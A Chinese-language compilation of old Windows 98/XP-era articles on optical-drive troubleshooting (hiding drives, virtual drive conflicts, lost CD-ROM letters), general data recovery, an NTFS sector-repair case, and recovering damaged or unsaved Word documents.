    重启计算机后，别人将无法在“我的电脑”下使用你的光驱，也无法通过“关闭系统→重新启动计算机并切换到MS-DOS方式”来访问你的光驱了。(广东 黄绍康)

    二、用软件来解决
    1.使用Tweak UI隐藏光驱。Tweak UI位于Windows 98安装光盘的\TOOLS\RESKIT\POWERTOY文件夹中。首先找到TWEAKUI。INF文件，鼠标右击此文件选择“安装”命令，这样便将Tweak UI安装在Windows的控制面板中了。接着进入控制面板，双击Tweak UI图标，单击“我的电脑”选项卡，此时本机全部的驱动器被罗列出来。要隐藏光驱就去掉光驱图标旁边的小钩，之后单击“确定”按钮关闭Tweak UI窗口，最后重新启动Windows。(重庆 谢军华)

    2.启动《超级兔子魔法设置》，选择“高级隐藏”，在“磁盘与文件夹”选项卡下，点击你的光盘盘符(如H:)，然后点击保存，重启机器，你就会发现光盘盘符不见了。这时，别人当然无法使用你的光驱了。为了安全，可以给《超级兔子魔法设置》设置一个启动密码，这样就更安全了。当你想使用光驱时，重复上述步骤，将H:前的钩去掉即可。

    3.启动《Windows优化大师》，选择“性能优化”下的“系统安全优化”，点击“更多设置”，选中你的光驱盘符，点击确定即可。为了安全，你也可以在“其他优化选项”设定《Windows优化大师》的启动密码。(山东 马坤)

    三、用自动批处理文件来解决
    在安装系统的分区里(通常是C:\)找到“Autoexec.bat”文件，单击右键，选择“编辑”，加入“subst *: d:\e”，然后保存退出。“*”是指你光盘的盘符，这样每次启动系统的时候，就会自动把光盘指向D盘的e文件夹(事先请建立此文件夹，或者指向其他文件夹也行)。以后，如果有人想打开光驱的话，他只能看到D盘e文件夹里的内容了。想解除的话，就把刚才所作修改的地方还原，重启即可(事先也可以备份“Autoexec.bat”，以后覆盖回去就行了)。


在Winows XP下稳定使用“虚拟光驱”

《一键清理系统垃圾》

在Winows XP下稳定使用“虚拟光驱”

    Windows XP作为一款至今为止最优秀的个人电脑操作平台，不但界面华丽美观，而且功能强大操作简便。从各大报刊媒体对它的介绍来看可见一斑，它受欢迎的程度绝不亚于当时的Windows 98。

    现在使用虚拟光驱的朋友是越来越多了，另外随着Windows XP打上了SP1补丁后，对游戏的兼容性的确大大提高了。所以现在用虚拟光盘玩游戏的朋友也相应增多了。此时问题
来了，由于大多数虚拟光驱的开发者都是在FAT32环境下开发的，而如果您在安装Windows XP时选择了NTFS的分区格式，那么死机或系统出现莫名故障就在所难免了。

    原因很简单，因为Windows XP为NTFS做了专门的优化，并且虚拟光驱由于本身的特殊机制，在“设备管理器”中通过“欺骗”的手段让Windows误认为增加了物理光驱，而在Windows XP中系统只设计了还原硬件的驱动，但并没有“还原/删除”硬件本身的功能，因此兼容性问题就产生了。所以笔者建议那些在XP下使用虚拟光驱的朋友们请安装最新版并支持XP的虚拟软件，这样兼容问题会得到妥善的解决。

    此外，在Windows XP下虚拟光驱的个数也非常有讲究。众所周知，Windows XP采用了“激活”技术来防止盗版，并且在计算机硬件更改规定的次数后要求再次进行激活，否则系统将会被锁死。聪明的您可能通过前面的介绍已经想到如果虚拟了4个以上的物理光驱，就可能会触发XP的激活检验机制，因此笔者建议，您如果想使用4个以上的虚拟盘，还是安装双系统，在Windows 98下就不会有这样尴尬的问题发生了。


怎样判断光驱故障

《一键清理系统垃圾》

怎样判断光驱故障

    当光驱出现问题时，一般表现为光驱的指示灯不停地闪烁、不能读盘或读盘性能下降；光驱盘符消失、光驱读盘时蓝屏死机或显示“无法访问光盘，设备尚未准备好”等提示框等。

    1.光驱连接不当造成

    光驱安装后，开机自检，如不能检测到光驱，则要认真检查光驱排线的连接是否正确、牢靠，光驱的供电线是否插好。如果自检到光驱这一项时出现画面停止，则要看看光驱（主、从）跳线是否无误。

    提醒：光驱尽量不要和硬盘连在同一条数据线上。

    2.内部接触问题

    如果出现光驱卡住无法弹出的情况，可能是光驱内部配件之间的接触出现了问题，可以尝试如下的方法解决：将光驱从机箱卸下并使用十字螺丝刀拆开，通过紧急弹出孔弹出光驱托盘，这样你就可以卸掉光驱的上盖和前盖了。卸下上盖后，会看见光驱的机芯，在托盘的左边或者右边会有一条末端连着托盘马达的皮带。你可以检查此皮带是否干净，是否错位，同时也可以给此皮带和连接马达的末端上油。另外，光驱的托盘两边会有一排锯齿，这个锯齿是控制托盘弹出和缩回的。请你给此锯齿上油，并看看它有没有错位之类的故障。如果上了油请将多余的油擦去，然后将光驱重新安装好，最后再开机试试看。

    提醒：由于这种维修比较专业，建议最好找专业人士修理。

    3.CMOS设置的问题

    如果开机自检到光驱这一项时出现停止或死机的话，有可能是CMOS设置中的光驱的工作模式设置有误所致。一般来说，只要将所有用到的IDE接口设置为“AUTO”，就可以正确地识别光驱工作模式了。对于一些早期的主板或个别现象则需要进行设置。

    4.驱动的问题

    在Windows系统中，当主板驱动因病毒或误操作而引起丢失时，会使IDE控制器不能被系统正确识别，从而引起光驱故障，这时我们只要重新安装主板驱动就可以了。

    另外，当一个光驱出现驱动重复或多次安装等误操作时会使Windows识别出多个光驱，这会在Windows启动时发生蓝屏现象。我们只要进入Windows安全模式（点选“我的电脑→属性→CD-ROM”）删除多出的光驱就解决了。

    5.光驱不支持DMA

    早期的光驱可能不支持DMA，可以将光驱的DMA接口关闭以免造成不兼容等现象。完成设置后，按下“确定”按钮，重新启动电脑即可。

    DMA接口光驱与主板不兼容时，也应关闭DMA。如果你真想发挥一下光驱DMA所带来的性能的话，建议升级主板的BIOS或光驱的固件（Firmware）。另外，光驱使用久后，会出现读盘不稳定的现象，我们可以试着关闭DMA，以降低性能，提高稳定性。

    6.虚拟光驱发生冲突

    在安装光驱的同时，一般会装个虚拟光驱使用。但安装虚拟光驱后，有时会发现原来的物理光驱“丢失”了，这是由于硬件配置文件设置的可用盘符太少了。解决方法：用Windows自带的记事本程序打开C盘根目录下的“Config.sys”文件，加入“LASTDRIVE=Z”，保存退出，重启后即可解决问题。

    在安装双光驱的情况下安装低版本的“虚拟光碟”后，个别情况会表现为有一个或两个物理光驱“丢失”！建议：换个高版本的或其他虚拟光驱程序。

    7.激光头老化

    排除了灰尘造成的原因，如果光驱还不能读盘，很可能是“激光头”老化了。这时，就要调整光驱激光头附近的电位调节器，加大电阻改变电流的强度使发射管的功率增加，提高激光的亮度，从而提高光驱的读盘能力。

    提醒：大家用小螺丝刀顺时针调节（顺时针加大功率、逆时针减小功率），以5度为步进进行调整，边调边试直到满意为止。切记不可调节过度，否则可能出现激光头功率过大而烧毁的情况。


找回Win98下丢失的光驱

《一键清理系统垃圾》

返回总目录 上一页 目录页

找回Win98下丢失的光驱

经常使用计算机的朋友可能会遇到在Win98中，光驱盘符有时莫名其妙地丢失的现象。在多次处理这类问题的过程中，笔者总结出光驱丢失的几个原因及其相应的解决方法，希望能对广大电脑使用者有所帮助。
    一、硬件故障或冲突
    使得系统启动时没有检测到CD-ROM这种硬件设备。其表现特征是在Win98图形界面出现以前，系统检测到的硬件设备中没有CD-ROM。这种光驱“丢失”现象一般都发生在使用者开机箱拔插硬件设备或设置CMOS等操作之后。因此找回光驱的办法是先按下面的顺序针对硬件进行检查：
    1.若光驱接在第二IDE口，应检查CMOS中的第二IDE口是否打开。因为有的主板可手工关闭第二IDE口。
    2.检查光驱数据线、电源线连接是否牢靠。
    3.光驱的跳线设置是否正确，这主要是针对新安装的第二个光驱或由两个光驱改为一个的情况。
    4.光驱的数据线及其使用的IDE口是否损坏。笔者就曾遇到过第二IDE口损坏，造成光驱丢失的情况。检查过程中可采取与硬盘互换IDE接口、互换数据线及与硬盘挂接在同一个IDE口等方法，来查看开机时系统能否检测到CD-ROM。经过以上4项检查后，加电重启机器，系统均可检测到CD-ROM设备（若仍检测不到，则应考虑光驱已坏）。
    二、光驱驱动程序不兼容
    这种光驱丢失发生在安装显卡等设备驱动程序或升级主板驱动程序并重新启动Win98之后。此时若检查Win98“控制面板”内“系统属性”中的“设备管理器”，在“硬盘控制器”中会有带黄色惊叹号的设备显示。而“控制面板”的“系统属性”中的“性能”一项则表明计算机工作在MS-DOS兼容方式。针对这种故障原因，可采用以下两种方法解决：
    1.删除“系统属性”内“设备管理器”中“硬盘控制器”的所有设备，然后重新启动机器。
    2.重新安装正常使用时的主板驱动程序，然后重新启动机器，一般就能找回光驱（如这两种方法只是使“设备管理器”和“性能”项恢复正常，光驱仍无法使用的话，请用下面第四种原因的解决方法）。
    三、计算机感染了某些病毒
    这种由于病毒造成的故障的突出特征是没有安装任何设备的驱动程序，但是“控制面板”内“系统属性”中的“性能”一项表明计算机工作在MS-DOS兼容方式，此时利用杀毒软件进行杀毒处理，重新启动后可找回光驱（关于计算机工作在MS-DOS兼容方式的原因也可能是由于系统启动时加载了实模式的DOS程序造成的，但这种情况一般不会使光驱丢失）。
    四、由于某些意外情况
    如可能是误删除光驱设备、系统死机重启等造成光驱丢失。可尝试用下面的方法进行恢复：
    1.编辑CONFIG.SYS和AUTOEXEC.BAT文件。若存在被Win98禁用的CD-ROM驱动程序，请手工打开，否则手工加载光驱的DOS驱动程序，然后重启机器。
    2.用CD-ROM安装盘在Win98的MS-DOS方式下安装CD-ROM驱动，重启机器。在系统找回光驱后，再手工编辑CONFIG.SYS和AUTOEXEC.BAT文件，禁用CD-ROM的DOS驱动程序，系统即可恢复正常。
    通过使用以上几种方法，可成功找回Win98中丢失的光驱盘符。上述方法也适用于Win97或Win95。


光驱刻录故障

《一键清理系统垃圾》

返回总目录

光驱刻录故障

◎CD—Writer 6020再生记
◎COMBO问题应用集锦
◎DVD-ROM读盘故障的检修
◎SCO XENIX/UNIX系统磁带机及光驱的安装
◎SCOUNIX如何使用IDE光驱
◎调节光头电流延长光驱寿命
◎干扰引发的光驱读盘故障
◎高倍速光驱不再挑盘
◎光盘“杀手”的修理方法
◎光盘打滑故障分析与排除
◎光盘读不出来的修理方法
◎光盘刻录机常见故障问答集锦（一）
◎光盘刻录机常见故障问答集锦
◎光盘刻录机常见问题
◎光驱
◎光驱常见故障排除
◎光驱出盒异常的原因及对策
◎光驱导致的STR功能失常
◎光驱的拆卸与清洗
◎光驱的基础知识和工作原理
◎光驱的日常保养与故障排除
◎光驱电动机转轴引起的故障
◎光驱电源接口故障维修
◎光驱故障的判断
◎光驱故障检修两例
◎光驱故障维修几例
◎光驱故障维修两例
◎光驱简易故障的维修
◎光驱简易故障的维修
◎光驱日常维护及故障维修
◎光驱特殊维修
◎光驱托盘不能弹出的故障解决
◎光驱维修一法
◎光驱延寿十法
◎光驱与光盘故障问答
◎解决光驱出盒困难
◎光驱读盘不正常
◎禁止光盘自动运行
◎经典故障 光驱丢失的原因分析及解决办法
◎刻录机
◎刻录机常见故障维修
◎刻录机故障维修实例
◎刻录机故障维修实例
◎刻录机欠载故障实例分析
◎刻录机常见故障
◎刻录机只读不写的软故障
◎巧换光驱激光头
◎巧妙解决由散热引起光驱故障
◎轻松处理光驱小毛病
◎清洗光盘引起的故障
◎清洗光盘引起的故障维修
◎如何关闭CD自动播放功能
◎如何在WinXP下使用刻录机
◎删除虚拟光驱创建的盘符
◎虚拟光驱抢占中断引起的鼠标故障
◎隐藏光驱的方法
◎在Winows XP下稳定使用“虚拟光驱”
◎怎样判断光驱故障
◎找回Win98下丢失的光驱

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


数据恢复全解析

《一键清理系统垃圾》

返回总目录 目录页 下一页

数据恢复全解析

    当今的世界已经完全步入了信息时代，在我们每天的生活当中，越来越多的事物正被以0和1的形式表示。数字技术与我们的联系越紧密，我们在其失效时就会承担越大的风险。 重要数据一旦破坏，我们讲承受巨大的损失，所以数据恢复产业应运而生。数据恢复在数据丢失和损坏时挽救这些数据，可以针对各种软硬件平台开展，从文件的误删除，存储设备受到严重破坏，专业的数据恢复工作都可能将数据恢复。在这篇文章里，我们会向大家介绍数据恢复的方方面面，并根据我们的经验给出一些建议，希望能够使大家更少受到数据损失的困扰。

    数据恢复技术原理

    数据恢复这项工作涵盖的范围很广，各种不同的存储介质在执行数据恢复的时候都会有一些区别，另外数据丢失或损坏的原因也不尽相同。我们讲解面向的对象主要是磁存储介质，如硬盘、软盘以及数据磁带等等。

    首先我们需要讲解一下磁存储技术的原理，这有助于我们更深刻的了解数据恢复工作。磁存储技术的工作原理是通过改变磁粒子的极性来在磁性介质上记录数据。在读取数据时，磁头将存储介质上的磁粒子极性转换成相应的电脉冲信号，并转换成计算机可以识别的数据形式。进行写操作的原理也是如此。要使用硬盘等介质上的数据文件，通常需要依靠操作系统所提供的文件系统功能，文件系统维护着存储介质上所有文件的索引。因为效率等诸多方面的考虑，在我们利用操作系统提供的指令删除数据文件的时候，磁介质上的磁粒子极性并不会被清除。操作系统只是对文件系统的索引部分进行了修改，将删除文件的相应段落标识进行了删除标记。

    同样的，目前主流操作系统对存储介质进行格式化操作时，也不会抹除介质上的实际数据信号。正是操作系统在处理存储时的这种设定，为我们进行数据恢复提供了可能。值得注意的是，这种恢复通常只能在数据文件删除之后相应存储位置没有写入新数据的情况下进行。因为一旦新的数据写入，磁粒子极性将无可挽回的被改变从而使得旧有的数据真正意义上被清除。

    另外，除了磁存储介质之外，其它一些类型存储介质的数据恢复也遵循同样的原理，例如U盘、CF卡、SD卡等等。因为这些存储设备也和磁盘一样使用类似扇区、簇这样的方式来对数据进行管理。举个例子来说，目前几乎所有的数码相机都遵循DCIM标准，该标准规定了设备以FAT形式来对存储器上的相片文件进行处理。

    相信大家了解了数据恢复的原理之后，就可以很容易的理解为什么使用普通的删除方法，无法彻底和安全的清除数据了。这也是为什么很多企业求助于专业的数据擦除服务公司，请他们使用专业的设备和软件彻底的对企业的敏感数据进行销毁。越来越多的情况证明，只是单纯的对存储介质进行覆写，乃至从物理上破坏存储设备，都不能保证数据不会被恢复出来。在一些拥有尖端设备的实验室中，既使被覆盖多次的磁盘，也可能被还原出最早存储在上面的磁性信号。这种情况对那些需要恢复他们宝贵数据的用户来说可能是个另人激动的消息，但对于希望保护自己数据的人们来说则恰恰相反。我们希望用户在了解了更多有关数据恢复技术的细节信息之后，能够选择恰当的方式来照管他们的数据。

    数据问题分析

    有很多种原因可能造成数据问题。最常见的原因当数人为的误操作，比如错误的删除文件、用错误的文件覆盖了有用数据等等。而存储器本身的损坏也占据了相当大的比重，高温、震动、电流波动、静电甚至灰尘，都是存储设备的潜在杀手。另外，很多应用程序特别是备份程序的异常中止，也可能造成数据损坏。在所有的原因当中，由于删除和格式化等原因造成的数据丢失是比较容易处理的，因为在这些情况下数据并没有从存储设备上真正擦除，利用数据恢复软件通常能够较好的将数据恢复出来。如果存储设备本身受到了破坏（例如硬盘盘片坏道、设备芯片烧毁等），会在很大程度上增加恢复工作的难度，并需要一些必备的硬件设施才能执行恢复，如果存储数据的介质本身（例如硬盘盘片、Flash Memeory）没有损坏的话，数据恢复的可能性仍然很大。我们通常称存储设备本身的损坏为物理性损坏，而对于非存储设备问题称之为逻辑性损坏。我们讨论的问题或者说在现实情况下遇到的大多数问题都属于逻辑性损坏之列。

对问题的情况和起因了解的越清楚，就越有可能完好的恢复出数据。因为不同的数据恢复手段会对存储设备造成不同的影响，采用错误方法带来的后果不仅仅是无法成功恢复，还有可能对数据造成进一步的破坏。工作人员应在已有信息的基础上进行进一步的检查工作，并根据检查的结果最终判断问题原因，拟定出处理方法。

    我们以对硬盘进行数据恢复为例，介绍在进行专业性的数据恢复工作时所执行的基本步骤。所有恢复工作都是在具备国际百级要求的无尘净室（Clean Room）中进行的，并且所有的操作设备都会置于非写入状态，以防对数据产生破坏。待处理的硬盘会先连入经过特殊改装的控制板，在禁止硬盘主轴电机启动的状态下拆开外壳。硬盘的磁头会被固定以使其无法接触磁碟表面，之后再利用高频示波器、信号分析仪等专业设备全面检查硬盘受损情况。如果对当前情况有足够的把握进行处理，再使用专用的读盘机进行介质读取工作。所有读出的原始信号会由专业工作人员根据原有操作系统情况还原成可用的数据文件，至此完成所有数据恢复工作。

    专业级的数据恢复成本较为高昂，通常起价就需要几百元人民币，而根据恢复的数据量大小，价格很可能还要高得多。很多情况下数据的重要性和价值并非都值得使用该种方式进行恢复，那么我们是否能够自己处理一些平常的问题呢。上面我们曾经提到过，我们遇到的绝大多数数据问题都是逻辑性损坏，所以我们也可以根据情况，对相对要求较低的数据恢复任务，使用数据恢复软件进行低成本的数据恢复工作。

目前流行的数据恢复软件包括EasyRecovery、FinalData、Acronis Disk Director、PC Inspector File Recovery、RecoverNT、Recover4all等等。其中EasyRecovery提供了相当多的恢复方式，兼具功能性和易用性，恢复能力也比较令人满意，是我们最常使用的一种数据恢复软件。需要注意的是，每种恢复软件都有其独到之处，并且在处理恢复工作时方式也不尽相同。如果一种软件无法正确的恢复数据，不妨试试其它的，大家不必追求一个在任何情况下都能产生完美结果的产品。
下面我们结合一款免费的数据恢复工具PC Inspector File Recovery 4.0讲解一个针对误删除文件的数据恢复工作实例，该软件可以在如下地址下载： http://www.pcinspector.de/file_recovery/cn/download.htm 。启动软件之后，我们首先需要选择要进行的工作，这里我们应该选择第一个大选项，即Recover deleted files。这个选项的下面还标注了该工作的一些基本步骤，Select logical drive是选择要恢复的分区，Select your files in folder ‘Deleted’意即在检查结果的“删除”分类中选择哪些文件是我们要恢复出来的，最后使用Save your files保存恢复出的数据文件即可。在我们使用PC Inspector File Recovery的过程中，觉得这款数据恢复软件的扫描速度非常快速，但是恢复能力仅在尚可以接受的程度，并且在运行的过程中不是非常稳定，偶尔会出现程序死锁等异常现象。如果这款软件能继续对这些问题加以改进，无疑是完成一般用户的一大福音。

    建议：对于遇到数据损坏等问题的读者，我们提供一些建议和注意事项，以帮助您更好的找回自己的数据：

    1． 保护很重要：数据恢复毕竟不能保证100%的成功，所以大家首先应该在数据没有出现问题的时候就有意识的对数据进行保护。例如不要在存储设备运行的时候突然断电，注意保持存储设备周围环境的温度、湿度和洁净程度，对重要的数据定期执行备份，在可能的情况下尽量由专业的计算机人员进行设备维护等等。当然，我们还应该注意防范电脑病毒等问题对数据的破坏。

    2． 发现问题尽快处理：我们知道数据的丢失和损坏通常是可以找回的，只要这些数据的存储位置没有被其它数据覆写。所以在发现数据丢失时，应该立即停止在存储设备上进行任何操作，如果可以正常关闭电源的话应尽快关闭，这样有助于最大限度的将数据恢复。在存储设备本身出现故障的情况下这一点尤其重要，因为电路原件的损坏在某些极端情况下可能会造成存储介质的擦除操作。

    3． 自己恢复要慎重：如果数据损坏问题的情况不是非常严重，大家可能希望自己进行数据恢复，例如只是不小心将文档删除掉。如果情况比较复杂，或者无法判定问题的起因及严重程度，请尽量不要自己执行恢复。特别是存储设备可能存在硬性损坏的时候，贸然操作很可能造成不可挽回的结果。例如一块硬盘如果存在坏道，用户自己使用恢复软件进行恢复的话很可能会对硬盘表面造成更大的伤害。国内现在有很多专业的数据恢复服务提供商，例如飞客数据恢复中心（http://www.sjaq.net）。在自己没有绝对把握的情况下，请尽量求助专业的数据恢复厂商。

    4． 一些好习惯：定期对磁盘等存储设备进行碎片整理是一个很好的操作习惯。在恢复误删除文件的时候，如果这个文件的存储位置非常分散，任何一个部分的损坏都可能造成整个文件无法还原。而进行数据整理可以使文件的存储位置尽量连续，这样可以在很大程度上增加恢复的成功率，既使必须利用一些16进制工具手动恢复数据，也可以大大降低工作难度和强度。另外我们建议使用尽量强壮的文件系统，比如在允许应用NTFS的时候就不要选择FAT文件系统。因为NTFS的文件索引是保存在硬盘上的，使用该索引进行数据恢复可以提高处理速度和成功率，并且较之FAT分区，NTFS的文件索引安全性更高。


NTFS格式大硬盘数据恢复特殊案例

《一键清理系统垃圾》

NTFS格式大硬盘数据恢复特殊案例

公司一块80G 迈拓金九硬盘，某天突然进不了分区，提示为“无法访问X： 参数错误”。硬盘上为该公司为本市摄制和编辑的运动会视频和音频文件，摄录磁带中已清除，运动会也不可能再开一次。先前到某电脑公司去试过，结果没能解决问题。广告公司经理和我的一个朋友是朋友，知道此事后就转来我处。

    修复过程：该硬盘为只有一个NTFS分区的数据盘，先在DOS下用扇区编辑软件查看LBA0--63扇区，结果发现分区表和63扇区都有错误，1—62扇区间有大量扇区被写上不明代码，87-102扇区不正常，先手工修复分区表，恢复63引导扇区，删除1—62扇区间的代码。87-102扇区之间暂不处理，到WINDOWS下检查，结果还是出现同样的提示，试用恢复软件1，可以看到目录结构，再试FINALDATE，这个软件此时太不尽人意；用恢复软件1选择某目录进行试恢复，结果28个试恢复文件只恢复2个，其余的全部为0字节，恢复工作陷入困境。再次对79-102扇区进行分析，79扇区面目全非，被严重篡改破坏，80-86扇区被清空，87-102扇区的内容也不正常。经过一番苦思冥想，对某些扇区进行备份后做清除，备份被放到1-62扇区之间，以备不测时改回原样。

    再次在WINDOWS下用恢复软件1进行恢复，让其读该盘约10秒钟，停止扫描，看到的内容和前面提到的相同，试恢复一个文件夹，从恢复过程能看到这时恢复动作正常了，随后对其余的文件和文件夹进行恢复，近3个多小时后，63.9G资料全部恢复，文件中几乎就AVI、WAV、PSD和其它格式的图形文件，逐个打开完全正常。恢复工作顺利结束，大功告成。

    后来一个朋友说这个分区应该是2000格式化出来的，mft在分区的前面，很容易被破坏，象此案里里面87-102扇区里大约有6个左右的用户文件/文件夹是恢复不出来的，但102~~以后的文件应该能完全恢复的。在ntfs里面，一般90扇区以后的mft才是用户的文件信息，前面的是系统的一些元文件，对数据恢复影响不大的。

    个人觉得ntfs还是比较先进的，文件碎片都放在一个mft里面，只要这个扇区没有被破坏，就可以恢复。

    NTFS的结构确实比较复杂，正常情况下所有的操作MFT中有记录。但是，那些扇区被使用，那些没被使用，这些概念还是很有用的。

    实验盘被删除79-102扇区内容后，开机后不需要第三方软件，文件和目录直接可以读出拷贝到其它地方。查看被删除扇区内容，95扇区后的内容都自动修复了，80-94嘛。。。。看来MFT中应该还有一个备份，或是具有自动修复功能。

    故障盘为何就不能自动修复？且不让访问。故障盘中某些扇区看来是被利用了。它的数据恢复是通过第三方软件得到的，对第三方软件来讲，就算格式化了，绝大部分数据还是能找回来的。


教你Word文档丢失的预防与数据的恢复

《一键清理系统垃圾》

教你Word文档丢失的预防与数据的恢复

相辛辛苦苦敲了大半天键盘，一篇文章眼看就快完成了，可是就在这时突然停电，或者程序停止了响应，甚至电脑死机，未完成的Word文档还没有保存……人世间最痛苦的事莫过于此。

    为了防止这样痛苦的事情发生，笔者觉得有必要向大家推荐防止Word文件丢失的方法。

    一、使用自动恢复功能：

    Word 2000/XP 能够自动恢复尚未保存的数据。大家只要单击“工具”菜单中的“选项”命令，然后单击“保存”标签，并选中“自动保存时间间隔”复选框，在“分钟”框中，输入时间间隔，以确定Word 2000/XP 保存文档的时间。时间越短，Word 2000/XP 保存文档越频繁，在 Word 2000/XP 中打开文档后出现断电或类似问题时，能够恢复的信息当然也就越多，一般我们设置为1分钟。

    经过上面的设置后，所有在发生断电或类似问题时处于打开状态的文档在下次启动Word时都会显示出来，大家可以对它们进行保存。不过在替换原有文档之前，请验证恢复文件包含有您需要的信息，不要覆盖了原先的文件。

    提示：

    (1)Word 2000/XP/XP的定时保存文件功能仅对DOC文件有效，其他文件无效，所以笔者建议您在编辑的时候先把文档存为Word格式，等编辑完成后再另存为其他格式;

    (2)“自动恢复”功能并不等同于正常的文档保存。如果在 Word 2000/XP 打开恢复文件后选择了不进行保存，则该文件将被删除，未保存的修改也将丢失。如果选择了保存恢复文件，它将会替换原文档(除非给它指定了一个新的文件名)。

    二、让文档自动备份

    如果我们的文档在保存的时候能够再保留一个备份的话，那无疑会使文档保险许多。而在Word 2000/XP中我们完全可以进行设置，让它保存文档的备份：

    单击“工具”菜单中的“选项”命令，接着选择“保存”标签，选中“保留备份”复选框，单击“确定”按钮。经过这样设置后， Word 2000/XP 就会自动保存文档的备份了。

    提示：

    (1)注意Word在编辑文档时会自动地保存其备份，它的扩展名不是“.bak”，而是“.wbk”，如果遇到文档打不开，则只要在打开的范围中选择“所有文件”，直接打开备份文档即可。

    (2)该备份提供了上一次所保存的副本，这样，原文档中会保存有当前所保存的信息，而副本中会保存有上次所保存的信息。每次保存文档时，新的备份都会取代已有的备份。这样就不用担心会不小心保存了不需要的信息或删除了原文件，保留备份可使工作成果免受损失。

    三、恢复受损文档中的文本

    有时候我们在试图打开一个文档时，计算机可能长时间无响应，则表示该文档可能已损坏。这时候同样不需担心，因为下次启动 Word 2000/XP 时，Word 2000/XP 会自动使用专门的文件恢复转换器来恢复损坏文档中的文本。也可随时用此文件转换器打开已损坏的文档并恢复其中的文本。而且操作起来也很简单：

    单击“工具”菜单中的“选项”命令，然后单击“常规”选项卡，并确认选中了“打开时确认转换”复选框，然后单击“确定”按钮。以后单击“打开”按钮 ，单击“文件类型”框中的“从任意文件中恢复文本”选项，成功打开损坏文档，可将它保存为 Word 格式或其他格式(例如，文本格式或 HTML 格式)。段落、页眉、页脚、脚注、尾注和域中的文字将被恢复为普通文字。

    提示：如果在“文件类型”框中没有看到“从任意文件中恢复文本”，则需要安装相应的文件转换器，单击“安装/卸载”选项卡上的“Microsoft Office”选项，并安装“文本恢复工具”即可。


拯救Word 2000损坏文档

《一键清理系统垃圾》

拯救Word 2000损坏文档

前几天，我打开一篇用Word编写的论文，却发现屏幕显示的内容混乱，还有好多乱码。这是我一年多的经验总结啊！这时正好好友笑农来访，我向他谈起此事，他微微一笑，说：“这好办！”他传授给我两个绝招，一试，果然灵验，现公布出来，与大家共享。

    一、文档格式法

    这种方法是将损坏的Word文档转换为另一种格式，然后再将其转换回Word文档格式。这是最简单和最彻底的文档恢复方法。

    1.在Word中打开损坏的文档后，选择“文件→另存为”，在“保存类型”列表中，选择“RTF格式(*.rtf)”，然后单击“保存”按钮。

    2.关闭损坏的文档，打开刚才保存的RTF格式文件，选择“文件→另存为”，在“保存类型”列表中，选择“Word文档(*.doc)”，然后单击“保存”按钮。

    3.关闭RTF文档，打开修改后的Word文档。

    Word文档与RTF的相互转换将保留其格式，如果这种转换没有纠正文件损坏，则可以尝试与其他字处理格式的相互转换，这将不同程度地保留Word文档的格式。如果使用这些格式均无法解决本问题，可将文档转换为纯文本格式(*.txt)，再转换回Word格式。由于纯文本的简单性，这种方法有可能更正损坏处，但是Word文档的所有格式设置都将丢失。

    二、重设格式法

    Word用文档中的最后一个段落标记关联各种格式设置信息，特别是节与样式的格式设置。这样我们就可以将最后一个段落标记之外的所有内容复制到新文档，就有可能将损坏的内容留在原始文档中。步骤如下：

    1.在Word中打开损坏的文档，选择“工具→选项”然后选择“编辑”选项卡，取消“使用智能段落选择范围”复选框前的勾。取消选中该复选框，选定整个段落时，Word将不会自动选定段落标记，然后单击“确定”按钮。

    2.选定最后一个段落标记之外的所有内容，方法是：按“Ctrl+End”组合键，然后按“Ctrl+Shift+Home”组合键。

    3.在常用工具栏中，依次单击“复制”、“新建”和“粘贴”按钮．


救回死机后Word未储存的资料

《一键清理系统垃圾》

救回死机后Word未储存的资料

大家常常会遇到一种情形，那就是当Word打到一半的时候，此时电脑当机了 ，如果很久没有存档 ，那真是欲哭无泪，所以在此偷偷告诉大家一个小秘方。

    当电脑当机时，Word中来不及存档的档案，他会暂时存放在C:\WINDOWS\Application Data\Microsoft\Word ，所以重开机时只要到上述的地方 ，找个档名为 → ＸＸＸ.asd 之类的这就是你刚辛苦打的文件了，再把副档名改为ＸＸＸ.doc ，就可以找到刚刚辛苦打的文件了。


一些常用文件的修复

《一键清理系统垃圾》

一些常用文件的修复

现在人们越来越多使用电子邮件进行联系，所以电子邮件包含了很多非常重要的个人信息，一旦出现问题，无法打开，损失非常大。因此，掌握一些关于修复故障邮件的办法非常重要。

    这里向大家推荐一款非常好的数据修复软件FinalData，具有非常强的修复功能，能修复包括文件分配表FAT、主引导记录MBR、引导扇区、MS Office 文件、影像文件、邮件等对系统和对我们日常工作非常重要的信息。FinalData是一个商业软件，功能最强的是它的企业版，比其它版本对了对于MS Office 文件和邮件的恢复功能。它的下载地址是：http://www.FinalData.com/

    因为FinalData是一个具有非常强劲功能的综合软件，因此在本书的很多修复方式都会涉及它，讲述相关的修复方法。

    首先，运行FinalData 2.0 企业版，主界面如图7-2-12。从界面上的主菜单中可以看到有“Office File Recovery”和“Email Recovery”两项，说明软件提供了对于Office文件和邮件的恢复功能。下面我们分别从几类常见的文件如何修复进行讲解。

    1.邮件文件的修复

    第一步，单击“Email Recovery”，选择“Start Email Recovery”，选择所修复的邮件所在的驱动器和文件夹，例如“C:Program FilesOutlook Express”，如图7-2-13，单击“OK”。开始查找所有被删除的邮件。

    图7-2-13 确定需要修复的邮件文件

    第二步，查找结束，出现下一个窗口，把窗口的“END”滑杆拉到最右边，获得恢复的最大值，如图7-2-14，单击“OK”。

    图7-2-14 选择查找范围

    第三步，开始扫描之前删除的邮件文件，如图7-2-15。

    图7-2-15 扫描被删除的文件

    第四步，确定你要修复的邮件软件，从邮件文件列表中选择要恢复的邮件文件，因为从列表上看不出邮件的具体信息，无法确定是否恢复。因此，选定一个文件，单击鼠标右键，选择“Recover Message”，以便查看邮件内容。

    第五步，邮件文件的列表显示出来，如图7-2-16。选择一个邮件，单击“view message”，以便查看邮件内容。用同样的方法一个一个地查看文件。

    图7-2-16 显示被删除的文件列表

    第六步，提过查看邮件的内容，确定需要恢复的邮件，然后单击“Recover”按钮，在随后出现的窗口中选择保存邮件的文件夹，但不要在删除以前所保存的位置，开始恢复。

    第七步，进入Outlook Express，打开刚才所保存的文件，在再次查看邮件信息是否正确，如果确实无误，单击菜单“打开”中的“移动到文件夹”，接着选择“收信箱”，单击“确定”，将刚才的邮件恢复到原来的收件箱。

    这样，一个邮件文件就被恢复了。

    2. MS Office 文件的修复

    第一步，在FinalData的主界面，单击图标栏的第一个图标或者在菜单“file”中选择“open”，在随后出现的窗口中选择目标驱动器。

    第二步，开始扫描磁盘相关数据，将选择范围调至最大，如同上例，如图7-2-17。

     图7-2-17 扫描范围调至最大

